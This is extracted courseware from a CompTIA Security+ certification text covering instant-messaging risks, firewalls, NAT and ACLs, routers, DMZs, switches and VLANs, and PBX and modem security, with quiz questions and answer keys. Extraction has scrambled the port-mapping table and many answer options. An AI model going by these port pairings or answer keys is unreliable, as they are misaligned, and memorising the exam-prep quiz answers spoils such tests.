CompTIA Security+ Certification Safeguards One can configure the firewall to filter some or all of these ports in order to restrict either certain functionalities within corresponding IM applications or to prevent usage altogether. It might be difficult to block the usage of IM systems such as Yahoo!s Instant Messenger because most of its traffic takes place over TCP port 80, which is the standard TCP port for regular Internet traffic. In situations like this, it is also possible to prevent usage by denying access to certain domains because, for instance, Yahoo! Messenger requires the user to be logged onto a specific subdomain. Smart systems such as intrusion detection systems (IDS) could be deployed to monitor and prevent IM traffic. You can have your IDS inspect all inbound and outbound network activity and identify suspicious patterns that might indicate a network or system attack from someone attempting to break into or compromise a system.

Lack of default encryption enables packet sniffing


One of the key problems facing any IM client is that all messages are passed in plaintext format unless the user takes some specific step to enable encryption. This makes any IM session extremely vulnerable to packet sniffing, especially if that IM session is occurring over an unencrypted wireless connection. There are a few solutions to this problem, including enabling a private channel communication, a step which turns on encryption on some IM products. Most notably the Microsoft NetMeeting offers a secure connection option, which encrypts all traffic between clients. In addition, Enterprise AIM product from AOL and a freeware IM client called Trillian from a company called Cerulean Studios (www.ceruleanstudios.com) both use encryption to protect message contents. Encryption solves only half the problem facing IM; it does nothing to address the issue of social engineering.

Social engineering overcomes even encryption


Social engineering, the obtaining of sensitive data by social means such as pretending to be someone who already has access, is on the rise and is particularly problematic when it comes to IM. IM uses traditional username/password authentication to verify someones identity, its moderately secure. The ease of use that IM provides means that it is possible for someone to gain access to an unguarded terminal and communicate with the world as if they were the actual user of that terminal. In such a case a quick question asked of another employee at a company can easily result in a serious security breach. Unlike e-mail which gives the person being questioned time to decide whether to respond, IM demands an almost immediate decision on the part of the person being questioned. Add to the situation the informal nature of IM, and you have a real problem.

Technical issues surrounding IM


As IM has matured, more features have been added. Current clients allow file transfer, voice, video, whiteboard technology, and the ability to help someone out by taking over their desktops. These features each come with their own security issues, but this unit only addresses the two most troublesome: file transfers and application sharing.

Wireless and instant messaging File transfers

839

The ability to send a file through IM is extremely powerful, but also very dangerous. Unlike e-mail attachments, which can be scanned as they arrive on a corporate server, IM attachments are much more difficult to handle and require an antivirus package on the local machine receiving the attachment. Application sharing The ability to remotely control a computer can be a boon to help desk operators, but it raises several issues. If the remote control software can be triggered by the remote site, then a machine with IM software running might be taken over without anyone knowing it. In addition, if the remote control software is being used by the remote site to connect to a local site that has been physically breached, then all of the actions of the controlling client might be seen by the wrong party.

Legal issues surrounding IM


Like e-mail, IM carries with it a possible threat of litigation or even criminal indictment should the wrong message be sent or overheard by the wrong person. Corporations spend millions each year to safeguard themselves from legal issues surrounding the proper use of e-mail. Proper use chapters abound in employee handbooks, and some businesses have even gone so far as to monitor the content of messages to ensure their employees say nothing inappropriate. IM is currently immune to most corporate efforts to control it. If a corporation allows IM, then they are opening themselves up to a whole raft of legal problems. Unlike email, IM must be monitored in real time, as most IM clients do not keep a saved log of messages unless the user expressly saves a dialog after a session.

Blocking IM
Blocking the use of IM is a straightforward task. If you install a corporate firewall of some sort to block the ports that IM products use, you will make IM unavailable to your employees, as limited blocking of IM is not possible at this time. If your employees should make a convincing case that IM is useful, then the best that can be done is make strong policies and limit IM clients to one or two vendors so you can maximize control.

Cellular phone SMS


Simple Messaging Service (SMS) is a quasi form of IM provided by most cell phone carriers. SMS is extremely similar to IM in that the messages are typed and sent immediately. The tracking of inappropriate messages and the risk of having messages sniffed are both problems with SMS technology.

840
Do it!

CompTIA Security+ Certification

D-1:

Discussing instant messaging

Questions and answers


1 Which of the following is a function of a typical instant messaging application? (Choose all that apply.)
A

File share Compiler Voice and video communication Chat

B
C D

2 Which of the following is false regarding IM applications? A B


C

These applications typically do not incorporate encryption mechanisms. Misconfigured file sharing within IM applications can lead to unwanted access to personal data. IM applications have built-in mechanisms that prevent the spreading of viruses. None of the above.

3 Specify the TCP or UDP port used for each of the following applications. AOL file transfers NetMessenger messages NetMessenger voice and video traffic NetMessenger file transfers Yahoo! Messenger file transfers ICQ messages ICQ voice and video traffic
TCP port 5190 TCP port 1863 UDP ports 11324 and 13325 TCP port 6891 TCP port 80 TCP port 3570 UDP port 6701

4 List three vulnerabilities associated with instant messaging.


Answers might include:

IM uses real-time communications: transaction logging is optional. Messages are passed in plaintext format by default. If a hacker can gain access to an unguarded terminal, he or she can pose a quick
question that requires an immediate response on the part of the person being questioned.

Each client must have antivirus software installed to scan IM messages for viruses. A machine running IM software can be taken over with remote control software without
anyone knowing it. In addition, if the remote control software is used to connect to a local site, all the actions of the controlling client can be seen by the wrong party.

Impossible for corporations to monitor the content of messages.

Wireless and instant messaging

841

5 What are some of the legal issues surrounding Instant Messaging software in the workplace?
IM carries with it a possible threat of litigation or even criminal indictment should the wrong message be sent to or received by the wrong person (similar to e-mail). Corporations spend millions each year to safeguard themselves from legal issues surrounding the proper use of e-mail. Many times businesses have even gone so far as to monitor the content of messages to ensure that their employees say nothing inappropriate.

842

CompTIA Security+ Certification

Unit summary: Wireless and instant messaging


Topic A In this topic, you learned about security issues related to wireless data transfer and 802.11x standards. You learned that IEEE established the 802.11 working groups to create standards of operability related to the interface between wireless clients and their network access points in a local area network environment. In this topic, you learned about Wireless Application Protocol (WAP) and how it works. You learned that WAP is an open, global specification that was created by the WAP Forum to deliver information and services to users of handheld digital devices. In this topic, you learned about Wired Equivalent Privacy (WEP). You learned that WEP is the encryption mechanism that was specified by the 802.11b protocol to provide authentication and confidentiality in a wireless LAN (WLAN) environment. In this topic, you learned about instant messaging. You learned that instant messaging (IM) is a process and application that allows users to send and receive messages in real time. IM can be used on both wired and wireless devices. You also learned that there are serious security concerns regarding the usage of consumer IM systems because these systems can transport sensitive and confidential data over the public networks in an unencrypted form.

Topic B

Topic C

Topic D

Review questions
1 One way to secure a wireless network is to use a: A Firewall B Scrambler
C

VPN

D DMZ 2 A recommended practice for wireless LANS is to: (Choose all that apply.) A Disable file and print sharing B Disable NetBEUI
C D

Enable WEP protection Use a strong encryption key

E All of the above 3 Which of the following can interfere with wireless transmission? (Choose all that apply.)
A

Brick walls

B Cell phones
C D

Cordless phones Distance

Wireless and instant messaging 4 The 802.11a standard can use which of the following bands? A 2.4GHz
B

843

5GHz

C 2.4MHz D 5MHz 5 The 802.11b standard can use which of the following bands?
A

2.4GHz

B 5GHz C 2.4MHz D 5MHz 6 The 802.11a standard can transmit data at speeds of up to _____Mbps. A 11 B 36 C 48
D

54

7 Which of the following protocols is used to encrypt wireless transmission? A WAP


B

WEP

C WSP D WDP 8 The IEEE working group F has been tasked with creating a standard to allow for better roaming between access points and distribution systems. True or false?
True

9 Which of the following is part of the WAP 1.x stack? (Choose all that apply.)
A B

WAE WTP

C WSSL
D

WDP

E WIP

844

CompTIA Security+ Certification 10 WAP 2.0 has added a number of features that include which of the following? (Choose all that apply.) A WAP Push B User agent profile C Wireless Telephony Application D External Functionality Interface (EFI) E Multimedia Messaging Service (MMS)
F

All of the above

11 Instant messaging networks operate in either ______________ or ___________ configurations. (Choose all that apply.)
A

peer-to-network

B network-to-network C client/server
D

peer-to-peer

12 AOL Instant Messenger uses which TCP port?


A

5190

B 5050 C 80 D 1023

91

Unit 9 Network devices


Unit time: 120 minutes Complete this unit, and youll know how to:
A Describe the purpose of a network firewall

and how firewalls are implemented.


B Explain how routers can be configured to

provide additional security to a network.


C Identify the vulnerabilities of switches. D Describe the proper measures for securing

telecom, cable modem, and wireless communications devices.


E Provide a secure remote connection

through RAS and VPN technologies.


F Identify the different types of intrusion

detection systems.
G Perform network monitoring.

92

CompTIA Security+ Certification

Topic A: Understanding firewalls


This topic covers the following CompTIA Security+ exam objective:
# 3.1 Objective Understand security concerns and concepts of the following types of devices Firewalls

Firewall concepts
Explanation There are really only two principal ways to secure a computer or network of computers from external breach: either physically isolate the computer or network from the outside world by disconnecting the network and telecom cables that provide contact with any other computers or networks; or virtually isolate the computer or network by implementing a firewall to stand guard between the outside world and the computer or network. A firewall is a barrier that isolates one network from another. Its main function is to protect an internal, private network from unauthorized access by an external, public network. The firewall can be a dedicated physical device or a software feature added to a router, switch, or other similar device. There are many ways to build a network firewall, but the following five steps will ensure that you have not missed anything: 1 Draft a written security policy. A well-written security policy ensures that the necessary blend of security and services is provided to the organization. 2 Design the firewall to implement the security policy. 3 Implement the firewall design by installing the selected hardware and software. 4 Test the firewall. Its fine to say you have a firewall, but if it doesnt work as intended, it might give you a false sense of security, increasing potential risk. 5 Review new threats, requirements for additional security, and updates to adopted systems and software. If additions or modifications are necessary, repeat the process from step one, in light of these changes. This is the management cycle for firewall protection, but the requirements of each, especially the first item, are often minimized or skipped, because most corporate managers find network security to be an arcane subject.

Drafting a security policy


Before implementing any security system, you should ask the following questions: What am I protecting? Whom am I protecting it from? What services does my company need to access over the network? Who gets access to which resources? Finally, who administers the network? By carefully considering these questions, you can draft a robust security policy. Available targets and who is aiming at them In answering the first and second questions, you need to determine what resources within your company need to be protected. Common areas of attack are Web servers, mail servers, FTP services, and databases. Its recommended that you complete a full audit of the resources in your organization so you have a better understanding of what targets are available.

Network devices

93

Scan for services that were not explicitly authorized by the company. Some employees might setup ad hoc FTP servers or Web servers, so it is critical to scan for open ports at all addresses. In addition, consider who might want to circumvent your security measures, and identify their motives. The types of hackers range from sport hackers, who are satisfied with merely penetrating your defenses, to hackers whose intent is causing damage or theft. Which services should be made available? In answering the third question, you should catalogue which services need to be available to your companys employees. Available services might provide access to intruders, so its imperative you lock out those services that are not needed. The following table is a table of common port mappings:
Service Dial Pad DNS FTP ICQ IPSEC IRC (Estimation) HTTP HTTPS NetMeeting NNTP Novell VPN software (BorderManager) pcAnywhere 2.0, 7.0, 7.50, 7.51 POP3 PPTP SMTP SSH SNMP Telnet TFTP AOL Instant Messenger 5190, 4443 TCP port # 51210 53 20, 21 4000 500 6661-6667 80 443 389, 522, 1503, 1720, 1731 119 353, 2010, 213 65301 110 1723 25 22, 1019-1023 161 23 69 22, 1019-1023 22 443 1080-6660 UDP port # 51200, 51201 53

By blocking those ports that correspond to services you do not need, your system will be more secure.

94

CompTIA Security+ Certification Who gets access to which resources? In addition to determining which services are required, you must determine who should have access to which resources within your network. You should list the employees or groups of employees along with the files, file servers, databases, and database servers to which they need access. In addition, you should list which employees need remote access to the network. Who administers the network? This question is easily answered, as it will be you who will be administering the network. On larger networks, however, there might be more than one person responsible for administering the network. These people, and the scope of individual management control, need to be determined up front.

Do it!

A-1:

Drafting a security policy

Questions and answers


1 What is a firewall?
A firewall is a barrier that isolates one network from another. Its main function is to protect an internal, private network from unauthorized access by an external, public network.

2 What are the recommended steps to build a network firewall? (Choose all that apply.) A B C D E
F

Draft a written security policy. Design the firewall to implement the security policy. Implement the firewall design by installing the selected hardware and/or software. Test the firewall. Review new threats. All of the above.

3 One of the steps to drafting a security policy is to catalogue which services need to be available to your companys employees and lock out all services that are not needed. True or false?
True

Network devices

95

Designing the firewall to implement the policy


Explanation Once you have your written security policy, you can begin the process of selecting the appropriate technology to deploy as your firewall. Reading through the remainder of this unit will familiarize you with available technologies and give you an understanding of what should be used under which circumstances.

What do firewalls protect against?


Firewalls effectively protect against malicious packets from the outside and unauthorized Internet access from within the company. There are several common network attacks that can be successfully blocked by a properly configured and functioning firewall: denial of service (DoS), ping of death, Teardrop or Raindrop attacks, SYN flood, LAND attack, brute force or smurf attacks, IP spoofing, and others. Firewalls offer no protection against malicious attacks from internal users.

How do firewalls work?


At their core, all firewalls protect networks using some combination of the following techniques: Network address translation (NAT) Basic packet filtering Stateful packet inspection (SPI) Access control lists (ACL) Basic firewalls use only one technique, usually NAT, but firewalls that are more comprehensive use all of the techniques combined. As added features usually increase complexity and cost however, its a good idea to closely examine your needs as written down in your security policy and implement only those solutions that are appropriate. Network address translation One of the most common security features offered by most firewalls is network address translation (NAT). NAT gives you the ability to mask the IP addresses of those computers behind the firewall from the external world. Even though private addresses are used internally, all internal routers have a default route that directs public addresses to a specific NAT router. Each time a connection is made from an internal private address, the NAT router selects an available public address from a pool of available IPs and inserts it into the packet prior to forwarding it on to the external network. A table that maps internal to external addresses is maintained to ensure proper mapping for the duration of the connection. Neither the host nor the client involved in the connection is aware of the intervening NAT, so no special accommodations need to be made in client or server applications. The problem with basic NAT is that each active connection requires a unique external address for the duration of the communication. With the increased use of the Web, a much higher percentage of internal systems are likely to be connected to the public network at a given time. Under basic NAT, this requires a much larger pool of public addresses. A derivative of NAT, port addresses translation (PAT) tackles this issue by supporting thousands of simultaneous connections on a single public IP address.

96

CompTIA Security+ Certification Port address translation PAT guarantees a unique connection by using a combination of an IP address and a TCP or UDP port, called a socket, rather than the address alone. When an internal system connects to an external resource, it typically selects a short-lived source port to create a unique socket. When the request routes through the NAT, the IP address is changed to a public address and a short-lived port is selected that guarantees uniqueness. A table of the source address, source port, NAT source IP, NAT source port, destination IP, and destination port is maintained by the router. The combination of NAT source IP and NAT source port and destination IP and port are guaranteed to be unique. PAT is really a subset of NAT and is now available in very inexpensive routers available for home use. This provides a useful method for conserving IP addresses, as well as concealing internal system identities. A drawback of this method is with the servereach external IP address can only support a single process on any given port, although the NAT router can direct these connections to different internal systems. NAT with port address translation is shown in the following table:
Inside Source Address: Port 10.1.1.2:1100 10.1.1.3:1200 Outside Source Address: Port 192.50.20.1:1024 192.50.20.1:1025 Outside Destination Address 192.50.20.2 192.50.20.3

Basic packet filtering After NAT, the most basic security function performed by a firewall is packet filtering. Packet filters decide whether to forward individual TCP/IP packets based on information contained in the packet header and on filtering rules set by the network administrator. Most packet filters can be configured to screen information based on the following data fields: protocol type, IP address, TCP/UDP port, and source routing information. Improper filtering can end up blocking valid packets or permitting rogue packets. For a more thorough discussion of network packet handling, see the section on routers later in this unit. Stateful firewalls Stateful firewalls represent a major advancement in firewall technology. They keep a record of every network connection in which they participate. They can record sessionspecific information, including which ports are in use on the client and server. This is important because, although most Internet services run on well-known ports, Internet clients might be using any port above 1023. A basic (stateless) packet filter must let Web servers respond to browsers at one of these high port numbers, but it cant tell which one, so it leaves them all open. Stateful packet inspection enhances security by allowing the filter to distinguish on which side of the firewall a connection was initiated. This latter feature is essential to blocking IP spoofing attacks. A stateful packet filter monitors the three-way handshake that initiates a TCP connection. Only TCP packets that are identified as being a part of the handshake, or can be identified with an established connection, are allowed through the firewall.

Network devices

97

Some filters even respond to connection requests on behalf of the internal server until the three-way handshake is properly completed by mimicking the connection to the internal server, and then they begin passing packets once the connection is made. Once a session is properly ended or times out, no additional packets are allowed on that connection without a new three-way handshake. This is an effective countermeasure against SYN floods. Access control lists Traffic filtering is available through access control lists (ACL). A Cisco router provides different levels of filtering; using either the standard or the extended list (the latter allows filtering by different criteria). The basic syntax is as follows:
access-list list_number network_mask access-list 101 permit/deny source_IP_address

For example, to stop any inbound packet with an internal (spoofed) source IP address:
deny 10.13.31.0 0.0.0.255

At the same time, to let all outbound internal packets through with a legitimate source IP address include:
access-list 102 permit 10.13.31.0 0.0.0.255

Access lists are executed from first statement to last until a match on the inspected packet is found, then all processing of the list stops, and the rule of the first match is applied. There is an implied deny everything else at the end of every list so if no matches occur, the packet is denied by default.

98
Do it!

CompTIA Security+ Certification

A-2:

Designing the firewall to implement policy

Questions and answers


1 Network address translation (NAT) involves the translating of the MAC address of a network interface card before a packet is sent out onto the Internet. True or false?
False. NAT masks the IP addresses of computers behind the firewall from the external world.

2 The problem with basic NAT is that each active connection requires a unique external address for the duration of the communication. True or false?
True

3 Stateless packet filters can record session-specific information about the network connection. True or false?
False: Stateful packet filters do this.

4 Which of the following data items is found in the port address translation table? (Choose all that apply.) A B C D
E

Source address NAT source port NAT source IP address Destination port All of the above

5 Most packet filters can be configured to screen information based on the protocol type, IP address, TCP/UPD port, and source routing information fields. True or false?
True

6 Access control lists work by blocking all inbound packets. True or false?
False: They can either allow or block inbound or outbound packets for specific IP addresses.

Network devices

99

Topic B: Routers
This topic covers the following CompTIA Security+ exam objective:
# 3.1 Objective Understand security concerns and concepts of the following types of devices Routers

Introducing routers
Explanation A router is a network management device that sits between different network segments and routes traffic from one network to another. This role of digital go-between is essential because it allows different networks to communicate with one another and allows the Internet to function. With the addition of packet filtering however, routers can take on an additional role of digital traffic cop.

How a router moves information


When you use your computer to access the Internet, you are employing the services of multiple routers. You type an address into your Web browser, the request is sent out into cyberspace, and the requested Web page loads on your browser. The steps involved are as follows: 1 Internet data, whether in the form of a Web page, a downloaded file, or an email message, travels over a packet-switching network. The information is broken up into pieces and inserted as data into packets. 2 To complete the packet, additional information is included: the senders address, the receivers address, and a checksum value that allows the receiving computer to be sure that the packet arrived intact. 3 Each packet is then sent to its destination using the best available route, which might differ for each packet. If the path the packet takes is not preset, then how is it chosen? That is where the router comes in. The routers that make up the main part of the Internet can reconfigure the paths that packets take because they are constantly in communication with one another and are aware of each of the networks to which they are connected. By examining the contents of the packet and comparing the destination address to the list of addresses contained in the routers lookup tables, they can determine which router to send the packet along to next, based on changing network conditions.

Beyond the firewall


Beyond the firewall, but before the Internet, lies a no-mans land called the demilitarized zone (DMZ) and, potentially, one or more bastion hosts.

910

CompTIA Security+ Certification Demilitarized zone (DMZ) The demilitarized zone (DMZ) is the area that a company sets aside for servers that are publicly accessible or have lower security requirements than other internal servers. The DMZ gets its name from the traditional setup of a network segment between two routers. This environment neither is subject to the unsecure environment of the Internet, nor is it fully protected by the internal routerhence it is demilitarized. The DMZ is commonly home to public Web, FTP, and DNS servers that need to be accessed by the public. This is also a typical location to place remote dial-up access, providing defense in depth with the interior router. If a hacker gains access to the RADIUS server, he or she still must authenticate through the internal firewall. This can be seen in Exhibit 9-1.

Exhibit 9-1: An example of a demilitarized zone (DMZ) Bastion hosts A bastion host is defined as a computer that resides in a DMZ and hosts Web, mail, DNS, and/or FTP services. An effective bastion host is configured quite differently from a typical host. Some organizations have a bastion host that offers several services at once; other organizations prefer to have several bastion hosts with each fulfilling a specific role. In either event, all unnecessary programs, services, and protocols are removed and all unnecessary network ports are disabled. In addition, bastion hosts do not share authentication services with trusted hosts within the network. This is so that, if a bastion host is compromised, the hacker cannot gain any information beyond what resides on the bastion host. ACLs are modified on the file system and other system objects. All appropriate service packs, hot fixes, and patches should be installed on bastion hosts. Logging of all security-related events should also be enabled, and those logs should be reviewed on a regular basis to increase the chance of observing any inappropriate behavior.

Network devices

911

Honey pots or decoy computers specifically set up to attract and track potential hackers are not considered true bastion hosts, because they are not designed to offer legitimate services to the Internet, but rather are deliberately exposed to delay and sidetrack potential hackers and to facilitate tracking of any attempted break-ins. Application gateways Application gateways, also known as proxy servers, monitor specific applications such as FTP, HTTP, and Telnet, plus they allow packets accessing those services to go to only those computers that are allowed. Application gateways are a good backup to packet filters because a firewall that is set up to allow a specific service such as FTP can send the allowed packets to only one computer, the application gateway. As an example of how an application gateway works, consider a site that blocks all incoming FTP connections except those to a specific computer. The router allows FTP packets to go to only one computer, the FTP application gateway. A user who wishes to connect inbound to an FTP server would have to connect first to the application gateway, and then to the destination computer, as follows: 1 A user first connects to the application gateway and enters the name of an internal computer. 2 The gateway checks the users source IP address and accepts or rejects it according to the access control list. 3 The user might need to authenticate himself or herself with a username and password. 4 The proxy service creates an FTP connection between the gateway and the internal computer. 5 The gateway proxy service then passes bytes between the two connections. 6 The application gateway logs the connection. The security advantages inherent in application gateways also include: Information hiding The application gateway might be the only computer with a name known to the outside world, the actual servers hosting services such as FTP need never be disclosed. Robust authentication and logging All traffic can be made to pass through the application gateway, traffic can be authenticated before it reaches internal computers and can be logged. Simpler filtering rules The application gateway is the only computer that needs to be contacted by the filtering firewall or router, those systems need only allow application traffic destined for the gateway and discard the rest. The chief disadvantage of application gateways is that a single computer host assigned as the gateway must handle all incoming connections that, in a busy environment, could overwhelm the gateway. In addition, in the case of client-server protocols such as HTTP, two steps are required to connect inbound or outbound traffic, and this can increase processor overhead if there are many connections.

912

CompTIA Security+ Certification

The OSI stack


To better describe the various functions in most networks and to further the development of compatible products by vendors, the Open Systems Interconnection (OSI) reference model was developed by the International Organization for Standardization. The seven layer model can be seen in Exhibit 9-2.

Exhibit 9-2: The OSI seven layer model The Physical layer (layer 1) deals with the electrical signals, the media access method (Ethernet, Token-Ring, etc.), and the actual hardware of networking, including cables, connectors, hubs and network cards. The Data Link layer (layer 2) deals with the MAC address. This is the layer where bridges and older switches function. The IP protocol works at the Network layer (layer 3), providing addressing and routing functions. The Transport layer (layer 4) is responsible for host-to-host communications. Its two protocols are TCP and UDP. The Session layer (layer 5) establishes, manages, and terminates connections. The Presentation layer (layer 6) translates the applications data format to the networks communication format. The Application layer (layer 7) defines how programs like FTP, HTTP, and Telnet exchange data.

Network devices

913

A function at each layer need only be able to communicate with the layers above and below it and be able to communicate with its peer level. Changes at one level should not affect the ability of the other layers to function. For instance, if a Token Ring network is migrated to an Ethernet system, only the cabling, hardware, and drivers that represent the Physical and Data-Link layers need be modified, but the IP network should still function, as well as all protocols and applications above it.

Limitations of packet-filtering routers


Defining packet filters can be a cumbersome task because network administrators must have a detailed understanding of the various Internet services, packet header formats, and the specific values they expect to find in each field. If complex filtering requirements must be supported, the ACL can become long, complicated, and increasingly difficult to manage and comprehend. In addition, as the list of filtering rules grows the processor overhead and, subsequently, the time it takes to handle a packet also grows. Generally, as the number of rules being processed by a router increases, the throughput of the router decreases. Most routers are optimized to extract the destination IP address from each packet, look up the forwarding information for the packet, and then send the packet on its way. With packet filtering enabled, the router must now apply each of the rules in the ACL and make a decision about forwarding the packet. This process increases the amount of time it takes to send a packet along and decreases the throughput speed of the router. Another problem with filtering packets at layers 3 through 5 is that the router is not able to determine the specific context or data of the packets it is examining. This means that the router can reject all e-mail packets but cannot reject just those e-mail packets that contain potentially harmful material such as viruses. In order to block a specific type of e-mail message, FTP request, or Telnet command, an application gateway or proxy server needs to be employed. Routers that employ stateful packet filters act as quasi application gateways, examining a packets content in addition to the IP address.

914
Do it!

CompTIA Security+ Certification

B-1: Discussing routers and gateways Questions and answers


1 When a packet goes through a router with ________________ packet inspection, the router inspects both the IP header and the content of the packet.
stateful

2 A computer that resides in a DMZ and hosts Web, mail, DNS, and/or FTP services is called a ________ ________.
bastion host

3 IP packets are routed by layer 2 of the OSI model. True or false?


False: They are routed by layer 3.

4 Application gateways are also known as proxy servers. True or false?


True

5 Some of the features of a DMZ are: A B C D


E

It is a network segment between two routers. Its servers are publicly accessible. Its servers have lower security requirements than other internal servers. It commonly contains bastion, public Web, FTP, DNS, and RADIUS servers. All of the above.

6 Application gateways simplify filtering rules on routers; the router need only allow application traffic destined for the gateway, and can discard the rest. True or false?
True

7 Which of the following tasks can be performed by the proxy server? (Choose all that apply.)
A B

Checks its access control list to accept or reject the client request Authenticates the user Opens a connection between the user and the internal computer Logs the connection All of the above

C
E

Network devices 8 Describe two limitations of packet-filtering routers in managing security.


Answers might include:

915

Packet filters can be cumbersome to define Processor overhead grows and throughput decreases with complexity of the ACL Stateless routers cannot examine the content of a packet

916

CompTIA Security+ Certification

Topic C: Switches
This topic covers the following CompTIA Security+ exam objective:
# 3.1 Objective Understand security concerns and concepts of the following types of devices Switches

Repeaters, hubs and switches


Explanation Many network devices, including repeaters, hubs, bridges, and switches, have both physical and logical configurations. Repeaters and hubs function at the Physical layer and extend the Ethernet segment by recreating the transmission signals. Hubs are simply multiport repeaters with all ports existing on the same collision domain. Bridges function at layer 2 and filter and forward packets based on their MAC address. They separate the network into two or more collision domains. Their function is based on a table of MAC addresses and host location built from the moment they are turned on. Switches also function at layer 2, but divide the network into multiple domains, the number depending on the number of ports on the switch. Although bridges and switches divide collision domains, they forward broadcasts to all hosts on the layer 2 network. An example of a switch is shown in Exhibit 9-3.

Exhibit 9-3: 3 Com SuperStack switch Just as they made moving information within an intranet more efficient, a new breed of switches is now operating at layer 3, the Network layer. Its now possible to combine the speed of hardware switching with the optimized path choosing of layer 3.

Switch security
Modern switches offer a variety of security features including ACLs and Virtual Local Area Networks (VLANs). The ACL-based packet filtering is similar to that mentioned previously, so this discussion concentrates on VLANs. From a security perspective, the major benefit of a switch over a hub is the separation of collision domains, limiting the possibility of easy sniffing.

Network devices Virtual local area networks The following is the Cisco definition of a virtual local area network (VLAN):

917

A VLAN is defined as a broadcast domain within a switched network. Broadcast domains describe the extent that a network propagates a broadcast frame generated by a station. Some switches might be configured to support a single or multiple VLANs. Whenever a switch supports multiple VLANs, broadcasts within one VLAN never appear in another VLAN. Switch ports configured as a member of one VLAN belong to a different broadcast domain, as compared to switch ports configured as members of a different VLAN. (Overview of Routing Between Virtual LANs, Cisco Systems.) VLANs increase security by clustering users in smaller groups, thereby making the job of the hacker harder. Rather than just gaining access to the network, a hacker must now gain access to a specific virtual LAN as well. In addition, by clustering users in a VLAN, the possibility of a broadcast storm is reduced. Security problems with switches Switches, even with VLANs enabled, are still susceptible to being compromised. Hackers can hijack a switch and reconfigure it to allow any traffic they wish through the system. Switch hijacking occurs when an unauthorized person is able to obtain administrator privileges of a switch and modify its configuration. Once a switch has been compromised, the hacker can do a variety of things, such as changing the administrator password on the switch, turning off ports to critical systems, reconfiguring VLANs to allow one or more systems to talk to systems they shouldnt, or they might configure the switch to bypass the firewall altogether. There are two common ways to obtain unauthorized access to a switch: trying default passwords, which might not have been changed, and sniffing the network to get the administrator password via SNMP or Telnet. Almost all switches built today come with multiple accounts with default passwords, and in some cases, no password at all. While most administrators know enough to change the administrator password for the telnet and serial console accounts, sometimes people dont know to change the SNMP strings that provide remote access to the switch. If the default SNMP strings are not changed or disabled, hackers might be able to obtain a great deal of information about the network or even gain total control of the switch. The Internet is full of sites that list the various switch types, their administrator accounts, SMTP connection strings, and passwords. If the default password(s) do not work, the switch can still be compromised if a hacker is sniffing the network while an administrator is logging on to the switch. Contrary to popular belief, its very possible to sniff the network when on some switches. This means that even if you change the administrator password(s) and the SNMP strings, you might still be vulnerable to switch hijacking. The easiest way to sniff a switched network is to use a software tool called dsniff, which tricks the switch into sending packets destined to other systems to the sniffer. Dsniff not only captures packets on switched networks, but also has the functionality to automatically decode passwords from insecure protocols such as Telnet, HTTP, and SNMP, which are commonly used to manage switches.

918

CompTIA Security+ Certification

Securing a switch
Gaining access to a switch is the first step in gaining control of it, all management interfaces on switches should be isolated to reduce the chance of a successful attack. Many switches use Telnet or HTTPboth being open text protocolsfor management. It is recommended that any management of the switch be done by physical connection to a serial port or through secure shell (SSH) or another encrypted method if available. Separate switches or hubs should be used for DMZs to physically isolate them from the rest of your network and prevent VLAN jumping. Its important to put a switch behind a dedicated firewall device. Ensure that you maintain the switch, installing the latest version of the switch software and any security patches to protect yourself against exploits such as the land.c attack. Read the product documentation, paying special attention to administration accounts and default passwords. Always set strong passwords on the switch. Do it!

C-1:

Understanding switches

Questions and answers


1 What is the function of a switch?
It separates a common segment into two or more collision domains and forwards packets to the correct domain based on the MAC address.

2 Modern switches can reduce broadcast traffic by forwarding packets based on the IP address. True or false?
True

3 A feature available in some switches that permit separating the switch into multiple broadcast domains is called ___________.
VLAN

4 What is switch hijacking?


This is an attack where an unauthorized person obtains administrator privileges of a switch and modifies its configuration to allow any traffic through the network. The hacker can change the switchs administrator password, turn off ports to critical systems, reconfigure VLANs, or configure the switch to bypass the firewall.

Network devices

919

Topic D: Telecom, cable modem, and wireless devices


This topic covers the following CompTIA Security+ exam objective:
# 3.1 Objective Understand security concerns and concepts of the following types of devices Wireless Modems Telecom / PBX (Private Branch Exchange) Mobile Devices

PBX, DSL, cable modems and mobile devices


Explanation Communications devices such as PBX, DSL, cable modems, and mobile devices require as much diligence when implementing security as the internal network. Your security policy should account for these often overlooked devices.

Private branch exchange


Private branch exchange (PBX) security is at heart very similar to traditional network security and is becoming increasingly more, so with the advent of IP-based telephony. An IP-based PBX is pictured in Exhibit 9-4.

Exhibit 9-4: An IP-based PBX network A traditional PBX is a computer-based telephone switch that might be thought of as a small, in-house, telephone company. Failure to secure a PBX can result in toll fraud, theft of information, denial of service, and enhanced susceptibility to legal liability because of disclosure of supposedly secure information. As with traditional networks, the process of securing a PBX should be part of a written security policy. Determining who will be administering your PBX, who will be allowed what services, and what access to the PBX will be allowed, are all essential pieces of information.

920

CompTIA Security+ Certification Many PBX systems are remotely managed by the vendor who developed the system. If a PBX is remotely managed, that means intrusion into the system can happen without anyone actually gaining physical access to the PBX hardware. It is recommended that, unless you are mandated to provide remote administration by the vendor, you remove this feature and administer the PBX from a console directly connected to the system. Additionally, many PBX systems are setup by default to allow handsets to be attached and detached at will by simply plugging a phone into the network and pressing a code on the keypad. This is done to ease maintenance, especially in those offices where hoteling or job sharing is common. Although this does ease the ability to move phones, it also opens a large security hole in the PBX system, because many of the move codes are standardized and posted on the Internet.

Modems
The increasing availability of digital cable and digital subscriber line (DSL) brought some new security issues with them. Although this section is too limited to cover them in depth, the discussion touches upon several of the more pressing issues. A typical cable modem can be seen in Exhibit 9-5.

Exhibit 9-5: EtherFast cable modem with USB and Ethernet Connection Model BEFCM U10 DSL versus cable modem security In the past, DSL had a security edge over cable systems. This came about because of the different methods by which the technologies connected their clients to the Internet. DSL lines provide a direct connection between the computer or network connected on the client side and the Internet. This direct connection is in contrast to the party line nature of cable systems. Cable modems are connected to a shared segment that, not unlike a corporate LAN, means that anyone else on that segment can potentially threaten your system unless proper precautions are taken. Although some cable customers encountered problems with the shared nature of the network in the past, most cable service providers now mitigate this problem by building security features into the cable modem hardware used to connect to their networks. In particular, basic network firewall capabilities now prevent customer files from being viewed or downloaded.

Network devices

921

Most cable modems today also implement the Data Over Cable Service Interface Specification (DOCSIS). DOCSIS includes support for cable network security features including authentication and packet filtering. Dynamic versus static IP addressing Another major security concern that used to plague both DSL and cable modem users was the issuing of static (permanent) IP addresses by the service providers. Now, most service providers use Dynamic Host Configuration Protocol (DHCP) to issue dynamic, random IP addresses to their clients. These are leased for a short period. Static addresses provide a fixed target for potential hackers, so the move to DHCP is definitely an improvement. Additional security can be provided by a firewall solution.

Wireless
